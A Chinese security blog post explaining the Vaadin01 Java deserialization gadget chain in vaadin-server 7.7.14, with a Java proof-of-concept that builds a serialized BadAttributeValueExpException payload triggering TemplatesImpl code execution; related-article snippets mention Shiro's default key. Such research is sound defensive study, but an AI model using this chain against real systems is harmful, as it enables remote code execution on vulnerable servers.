Vaadin01 反序列化

最新推荐文章于 2024-11-04 20:33:37 发布
最新推荐文章于 2024-11-04 20:33:37 发布
阅读量210 收藏 1
点赞数
分类专栏: java安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122704330
版权

Vaadin01 反序列化

依赖

<dependency>
    <groupId>com.vaadin</groupId>
    <artifactId>vaadin-server</artifactId>
    <version>7.7.14</version>
</dependency>

Gadget

/*
 * Gadget:
 *   BadAttributeValueExpException#readObject
 *     PropertysetItem#toString
 *       NestedMethodProperty#getValue
 *         Method#invoke
 *           TemplatesImpl#getOutputProperties
 * */

NestedMethodProperty#getValue 方法存在动态方法调用,很容易就能构造出执行 TemplatesImpl#getOutputProperties 方法的链

public class Vaadin01 {

    public static byte[] getSerializeData() throws Exception{
        TemplatesImpl templatesImpl = CreateTemplatesImpl.createTemplatesImpl();
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        PropertysetItem propertysetItem = new PropertysetItem();
        NestedMethodProperty nestedMethodProperty = new NestedMethodProperty(templatesImpl,"outputProperties");
        propertysetItem.addItemProperty("1",nestedMethodProperty);
        Reflect.reflectSetField(badAttributeValueExpException,"val",propertysetItem);
        byte[] bytes = SerWithUnSer.serialize(badAttributeValueExpException);
        return bytes;
    }
    
    public static void main(String[] args) throws Exception{
        ParseArgs.parseArgs(args);
        byte[] bytes = getSerializeData();
        SerWithUnSer.unSerialize(bytes);
    }
}
0x6b79
关注
专栏目录
Vaadin介绍与开发练习之一(总体介绍与创建项目)
oscar999的专栏
03-22 1万+
Vaadin是什么? Vaadin是一个web应用程式开发框架。基于这个框架,开发者可以使用Java开发高质量的用户界面。 Vaadin由位于芬兰的 IT Mill公司开发。 其前身是 IT Mill 公司由2000年起开始研发的 Millstone用户界面类库。 Vaadin提供了一系列的用户界面组件用来创建自己的组件。特点主要包含:易用、可重用、可扩展和满足大型企业应用需求。 Vaadin...
《WEB安全渗透测试》(36) JAVA反序列化工具ysoserial使用介绍
午夜安全
05-31 1901
作者介绍:ysoserial是一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。ysoserial其实就是工具,集合了各种java反序列化的payload,利用它可以方便的测试反序列化漏洞。
android-json-0.0.20131108.vaadin1.jar
01-08
android-json-0.0.20131108.vaadin1.jar
Java反序列化漏洞-ROME利用链分析
l11III1111的博客
12-04 3479
直接看到执行getOutputProperties的方法 调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象 具体获取getter和setter方法在getPDs的另一个重载了的方法里面 而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,
Java安全』反序列化-CC5反序列化漏洞POP链分析_ysoserial CommonsCollections5 PoC分析
Ho1aAs‘s Blog
03-12 1036
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. LazyMap.get()调用this.factory.transform()2. TiedMapEntry.toString()调用this.map.get()3. BadAttributeValueExpException反序列化触发this.val.toString()POP链完 前言 由于jdk8修复了AnnotationInvokerHandler,cc1用不了了 cc5在cc1点基础上做了小的改进,还是使用Commons-Collect
对象序列化的几种方式的比较
我的角落
01-25 642
 在java中socket传输数据时,数据类型往往比较难选择。可能要考虑带宽、跨语言、版本的兼容等问题。比较常见的做法有两种:一是把对象包装成JSON字符串传输,二是采用java对象的序列化和反序列化。随着Google工具protoBuf的开源,protobuf也是个不错的选择。对JSON,Object Serialize,ProtoBuf 做个对比。 定义一个待传输的对象UserVo: ...
[Java反序列化]—Rome反序列化
Sentiment的博客
04-28 571
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
GeoJsonPoint反序列化问题
qq_45442257的博客
01-14 1162
序列化对象类 package com.tanhua.commom.pojo; import jdk.nashorn.internal.ir.annotations.Ignore; import lombok.AllArgsConstructor; import lombok.Data; import lombok.NoArgsConstructor; import org.bson.types.ObjectId; import org.springframework.data.annotation.Id;
spring-vaadin:Spring和Vaadin集成
05-18
序列化 您应该对ApplicationContext和其他上下文的Bean使用“ transient”属性。 @Autowired private transient ApplicationContext applicationContext; 变更日志 3.2 我需要7.6支持 Spring Framework 4.2 3.1 ...
shiro反序列化漏洞复现
weixin_45682070的博客
08-21 3181
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。 工作原理 Shiro的记住用户会话功能 获取RememberMe的值 —> Base64解密 —> ASE解密 –> 反序列化 漏洞原理 因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题 在 1.2.4 版本前,是默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==,可以直接反序列化执行恶意代码 而在1.2.4之后,ASE秘钥就不为默认了,需要获取
requestfactory-apt-2.6.0.vaadin5.zip
10-11
它使用Java对象来表示服务器上的数据,并自动处理序列化、HTTP请求和错误处理。RequestFactory使得开发者能以面向对象的方式处理远程服务,避免了直接操作XML或JSON数据。 2. **Vaadin框架**:Vaadin是一个用于构建...
Vaadin教程】利用IDEA开发基于Vaadin网络聊天室程序
weixin_33893473的博客
05-06 431
为什么80%的码农都做不了架构师?>>> ...
Vaadin入门(1)
awed2013的专栏
07-04 2032
Vaadin较早以前就知道这个框架了,从Vaadin6一直关注到现在的版本7,发现有较大的改变,可惜一直在工作中没机会使用。 虽然没机会在工作中使用,但觉得这个框架还是挺不错的,但在国内好像使用的人相当的少,今天突然发现在官网竟然有 中文讨论区了,也许这个框架开始向中国发力了,呵呵。得好好学习一下,同时也希望能找到一些学习这个框架的朋友。 首先,IDE的安装,磨刀不误砍材功嘛,个人喜
HashMap为什么线程不安全?
rnnf_yyds的博客
11-03 442
HashMap底层是基于数组 + 链表(在 Java 8 以后,当链表长度超过一定阈值时会转换为红黑树)的数据结构。在多线程环境下,当多个线程同时对HashMap进行put操作时,可下面这种情况:假设两个线程 A 和 B 同时执行put操作,它们计算出的插入位置相同(假设为index线程 A 先获取到了当前index位置的节点,在它还没来得及将新节点插入链表(或树)时,线程 B 也获取到了这个位置的节点。
[自用,更新自day5]瑞吉外卖代码及笔记
lapiii的博客
11-01 933
当使用ThreadLocal维护变量时,ThreadLocal为每个使用该变量的线程提供独立的变量副本,所以每一个线程都可以独立地改变自己的副本,而不会影响其它线程所对应的副本。Mybatis Plus公共字段自动填充,也就是在插入或者更新的时候为指定字段赋予指定的值,使用它的好处就是可以统一对这些字段进行处理,避免了重复代码。因为在分页查询的Dish的records(菜品记录中),只有这个菜品所属的categoryId,但是我们需要分页的时候展示的是菜品名字。
服务器虚拟化
Hellc007的博客
10-30 974
服务器虚拟化是一种将物理服务器的计算资源分割为多个独立虚拟环境的技术,通过软件层将底层硬件资源抽象化并在上层构建多个虚拟机(Virtual Machine, VM)。每个虚拟机运行独立的操作系统和应用程序,相互之间不受干扰,具备类似于物理服务器的功能。这种技术使得一台物理服务器能够承担多台虚拟服务器的角色,从而极大地提升了硬件资源的利用率。服务器虚拟化的概念最早可追溯到20世纪60年代IBM大型机时代,当时虚拟化被用来将大型机的资源分配给多个任务,使得企业在有限的资源下能够同时运行多个应用。
JAVA 插入 JSON 对象到 PostgreSQL
qq_52143611的博客
10-30 979
在现代软件开发中,由于 JSON 数据的轻量和通用性,处理 JSON 数据已经变得无处不在。PostgreSQL凭借其对 JSON 的强大支持,为存储和查询 JSON 数据提供了出色的平台。为了将JSON数据保存到PostgreSQL数据库中,我们可以将JSON数据转换为PostgreSQL的JSONB类型数据,然后将其存储在数据库中。在Java中,我们可以使用JDBC或者基于ORM框架的方式来实现这一功能。
spring循环依赖解决方式
最新发布
qq_36400213的博客
11-04 486
字段注入和setter注入则提供了更多的灵活性,但需要更谨慎地管理对象的状态。方法注入和注解注入则适用于特定的场景。在Spring框架中,依赖注入(Dependency Injection,DI)是一种实现控制反转(Inversion of Control,IoC)的机制,用于将对象的依赖关系自动注入到对象中。这种方式不如构造器注入严格,但比字段注入更灵活,因为它可以在不创建新实例的情况下改变对象的依赖。这种方式是推荐的,因为它可以保证对象在创建时就处于完全初始化的状态,并且可以使得bean不可变。
SpringSession源码分析
lkr_lkr的博客
11-01 332
默认对常规Session的理解和使用,如何使用Set-Cookie。
Vaadin TestBench自动化测试入门指南
Vaadin TestBench 是一个自动化测试工具,专门用于测试 Vaadin 应用程序。Vaadin 是一个用于构建现代Web应用的开源框架,它允许开发者使用 Java 语言来构建跨浏览器的丰富Web界面。TestBench 利用 Selenium ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值